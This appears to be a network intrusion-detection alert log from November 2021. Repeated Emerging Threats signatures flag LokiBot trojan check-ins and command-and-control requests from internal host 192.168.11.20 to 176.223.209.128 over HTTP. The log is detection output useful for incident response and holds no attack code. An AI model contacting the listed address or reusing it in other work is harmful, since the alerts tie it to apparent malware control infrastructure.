11/25/21-10:54:43.528950	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50629	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.528950	TCP	2025381	ET TROJAN LokiBot Checkin	50629	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.528950	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50629	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.982401	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50630	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.982401	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50630	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.982401	TCP	2025381	ET TROJAN LokiBot Checkin	50630	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.982401	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50630	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.482333	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50631	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.482333	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50631	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.482333	TCP	2025381	ET TROJAN LokiBot Checkin	50631	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.482333	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50631	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.983291	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50632	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.983291	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50632	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.983291	TCP	2025381	ET TROJAN LokiBot Checkin	50632	80	192.168.11.20	176.223.209.128
11/25/21-10:54:44.983291	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50632	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.439633	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50633	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.439633	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50633	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.439633	TCP	2025381	ET TROJAN LokiBot Checkin	50633	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.439633	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50633	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.952049	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50634	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.952049	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50634	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.952049	TCP	2025381	ET TROJAN LokiBot Checkin	50634	80	192.168.11.20	176.223.209.128
11/25/21-10:54:45.952049	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50634	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.455302	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50635	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.455302	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50635	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.455302	TCP	2025381	ET TROJAN LokiBot Checkin	50635	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.455302	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50635	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.977531	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50636	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.977531	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50636	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.977531	TCP	2025381	ET TROJAN LokiBot Checkin	50636	80	192.168.11.20	176.223.209.128
11/25/21-10:54:46.977531	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50636	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.479979	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50637	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.479979	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50637	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.479979	TCP	2025381	ET TROJAN LokiBot Checkin	50637	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.479979	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50637	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.949235	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50638	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.949235	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50638	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.949235	TCP	2025381	ET TROJAN LokiBot Checkin	50638	80	192.168.11.20	176.223.209.128
11/25/21-10:54:47.949235	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50638	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.460000	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50639	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.460000	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50639	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.460000	TCP	2025381	ET TROJAN LokiBot Checkin	50639	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.460000	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50639	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.980264	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50640	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.980264	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50640	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.980264	TCP	2025381	ET TROJAN LokiBot Checkin	50640	80	192.168.11.20	176.223.209.128
11/25/21-10:54:48.980264	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50640	80	192.168.11.20	176.223.209.128
11/25/21-10:54:49.491342	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50641	80	192.168.11.20	176.223.209.128
11/25/21-10:54:49.491342	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50641	80	192.168.11.20	176.223.209.128
11/25/21-10:54:49.491342	TCP	2025381	ET TROJAN LokiBot Checkin	50641	80	192.168.11.20	176.223.209.128
11/25/21-10:54:49.491342	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50641	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.009142	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50642	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.009142	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50642	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.009142	TCP	2025381	ET TROJAN LokiBot Checkin	50642	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.009142	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50642	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.524009	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50643	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.524009	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50643	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.524009	TCP	2025381	ET TROJAN LokiBot Checkin	50643	80	192.168.11.20	176.223.209.128
11/25/21-10:54:50.524009	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50643	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.017243	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50644	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.017243	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50644	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.017243	TCP	2025381	ET TROJAN LokiBot Checkin	50644	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.017243	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50644	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.521089	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50645	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.521089	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50645	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.521089	TCP	2025381	ET TROJAN LokiBot Checkin	50645	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.521089	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50645	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.987314	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50646	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.987314	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50646	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.987314	TCP	2025381	ET TROJAN LokiBot Checkin	50646	80	192.168.11.20	176.223.209.128
11/25/21-10:54:51.987314	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50646	80	192.168.11.20	176.223.209.128
11/25/21-10:54:52.546072	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50647	80	192.168.11.20	176.223.209.128
11/25/21-10:54:52.546072	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50647	80	192.168.11.20	176.223.209.128
11/25/21-10:54:52.546072	TCP	2025381	ET TROJAN LokiBot Checkin	50647	80	192.168.11.20	176.223.209.128
11/25/21-10:54:52.546072	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50647	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.019558	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50648	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.019558	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50648	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.019558	TCP	2025381	ET TROJAN LokiBot Checkin	50648	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.019558	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50648	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.534335	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50649	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.534335	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50649	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.534335	TCP	2025381	ET TROJAN LokiBot Checkin	50649	80	192.168.11.20	176.223.209.128
11/25/21-10:54:53.534335	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50649	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.011787	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50650	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.011787	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50650	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.011787	TCP	2025381	ET TROJAN LokiBot Checkin	50650	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.011787	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50650	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.518849	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50651	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.518849	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50651	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.518849	TCP	2025381	ET TROJAN LokiBot Checkin	50651	80	192.168.11.20	176.223.209.128
11/25/21-10:54:54.518849	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50651	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.034068	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50652	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.034068	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50652	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.034068	TCP	2025381	ET TROJAN LokiBot Checkin	50652	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.034068	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50652	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.547945	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50653	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.547945	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50653	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.547945	TCP	2025381	ET TROJAN LokiBot Checkin	50653	80	192.168.11.20	176.223.209.128
11/25/21-10:54:55.547945	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50653	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.056137	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50654	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.056137	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50654	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.056137	TCP	2025381	ET TROJAN LokiBot Checkin	50654	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.056137	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50654	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.566470	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50655	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.566470	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50655	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.566470	TCP	2025381	ET TROJAN LokiBot Checkin	50655	80	192.168.11.20	176.223.209.128
11/25/21-10:54:56.566470	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50655	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.072320	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50656	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.072320	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50656	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.072320	TCP	2025381	ET TROJAN LokiBot Checkin	50656	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.072320	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50656	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.565910	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50657	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.565910	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50657	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.565910	TCP	2025381	ET TROJAN LokiBot Checkin	50657	80	192.168.11.20	176.223.209.128
11/25/21-10:54:57.565910	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50657	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.031226	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50658	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.031226	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50658	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.031226	TCP	2025381	ET TROJAN LokiBot Checkin	50658	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.031226	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50658	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.463608	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50659	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.463608	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50659	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.463608	TCP	2025381	ET TROJAN LokiBot Checkin	50659	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.463608	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50659	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.966616	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50660	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.966616	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50660	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.966616	TCP	2025381	ET TROJAN LokiBot Checkin	50660	80	192.168.11.20	176.223.209.128
11/25/21-10:54:58.966616	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50660	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.471626	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50661	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.471626	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50661	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.471626	TCP	2025381	ET TROJAN LokiBot Checkin	50661	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.471626	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50661	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.978509	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50662	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.978509	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50662	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.978509	TCP	2025381	ET TROJAN LokiBot Checkin	50662	80	192.168.11.20	176.223.209.128
11/25/21-10:54:59.978509	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50662	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.435673	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50663	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.435673	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50663	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.435673	TCP	2025381	ET TROJAN LokiBot Checkin	50663	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.435673	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50663	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.937404	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50664	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.937404	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50664	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.937404	TCP	2025381	ET TROJAN LokiBot Checkin	50664	80	192.168.11.20	176.223.209.128
11/25/21-10:55:00.937404	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50664	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.418915	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50665	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.418915	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50665	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.418915	TCP	2025381	ET TROJAN LokiBot Checkin	50665	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.418915	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50665	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.928401	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50666	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.928401	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50666	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.928401	TCP	2025381	ET TROJAN LokiBot Checkin	50666	80	192.168.11.20	176.223.209.128
11/25/21-10:55:01.928401	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50666	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.442047	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50667	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.442047	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50667	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.442047	TCP	2025381	ET TROJAN LokiBot Checkin	50667	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.442047	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50667	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.979042	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50668	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.979042	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50668	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.979042	TCP	2025381	ET TROJAN LokiBot Checkin	50668	80	192.168.11.20	176.223.209.128
11/25/21-10:55:02.979042	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50668	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.513245	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50669	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.513245	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50669	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.513245	TCP	2025381	ET TROJAN LokiBot Checkin	50669	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.513245	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50669	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.981457	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50670	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.981457	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50670	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.981457	TCP	2025381	ET TROJAN LokiBot Checkin	50670	80	192.168.11.20	176.223.209.128
11/25/21-10:55:03.981457	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50670	80	192.168.11.20	176.223.209.128
11/25/21-10:55:04.538402	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50671	80	192.168.11.20	176.223.209.128
11/25/21-10:55:04.538402	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50671	80	192.168.11.20	176.223.209.128
11/25/21-10:55:04.538402	TCP	2025381	ET TROJAN LokiBot Checkin	50671	80	192.168.11.20	176.223.209.128
11/25/21-10:55:04.538402	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50671	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.052795	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50672	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.052795	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50672	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.052795	TCP	2025381	ET TROJAN LokiBot Checkin	50672	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.052795	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50672	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.569177	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50673	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.569177	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50673	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.569177	TCP	2025381	ET TROJAN LokiBot Checkin	50673	80	192.168.11.20	176.223.209.128
11/25/21-10:55:05.569177	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50673	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.082836	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50674	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.082836	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50674	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.082836	TCP	2025381	ET TROJAN LokiBot Checkin	50674	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.082836	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50674	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.598789	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50675	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.598789	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50675	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.598789	TCP	2025381	ET TROJAN LokiBot Checkin	50675	80	192.168.11.20	176.223.209.128
11/25/21-10:55:06.598789	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50675	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.053125	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50676	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.053125	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50676	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.053125	TCP	2025381	ET TROJAN LokiBot Checkin	50676	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.053125	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50676	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.557350	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50677	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.557350	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50677	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.557350	TCP	2025381	ET TROJAN LokiBot Checkin	50677	80	192.168.11.20	176.223.209.128
11/25/21-10:55:07.557350	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50677	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.069898	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50678	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.069898	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50678	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.069898	TCP	2025381	ET TROJAN LokiBot Checkin	50678	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.069898	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50678	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.535660	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50679	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.535660	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50679	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.535660	TCP	2025381	ET TROJAN LokiBot Checkin	50679	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.535660	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50679	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.993230	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50680	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.993230	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50680	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.993230	TCP	2025381	ET TROJAN LokiBot Checkin	50680	80	192.168.11.20	176.223.209.128
11/25/21-10:55:08.993230	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50680	80	192.168.11.20	176.223.209.128
11/25/21-10:55:09.501050	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50681	80	192.168.11.20	176.223.209.128
11/25/21-10:55:09.501050	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50681	80	192.168.11.20	176.223.209.128
11/25/21-10:55:09.501050	TCP	2025381	ET TROJAN LokiBot Checkin	50681	80	192.168.11.20	176.223.209.128
11/25/21-10:55:09.501050	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50681	80	192.168.11.20	176.223.209.128
11/25/21-10:55:10.027946	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50682	80	192.168.11.20	176.223.209.128
11/25/21-10:55:10.027946	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50682	80	192.168.11.20	176.223.209.128
11/25/21-10:55:10.027946	TCP	2025381	ET TROJAN LokiBot Checkin	50682	80	192.168.11.20	176.223.209.128
11/25/21-10:55:10.027946	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50682	80	192.168.11.20	176.223.209.128
11/25/21-10:55:10.499801	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50683	80	192.168.11.20	176.223.209.128
11/25/21-10:55:10.499801	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50683	80	192.168.11.20	176.223.209.128
11/25/21-10:55:10.499801	TCP	2025381	ET TROJAN LokiBot Checkin	50683	80	192.168.11.20	176.223.209.128
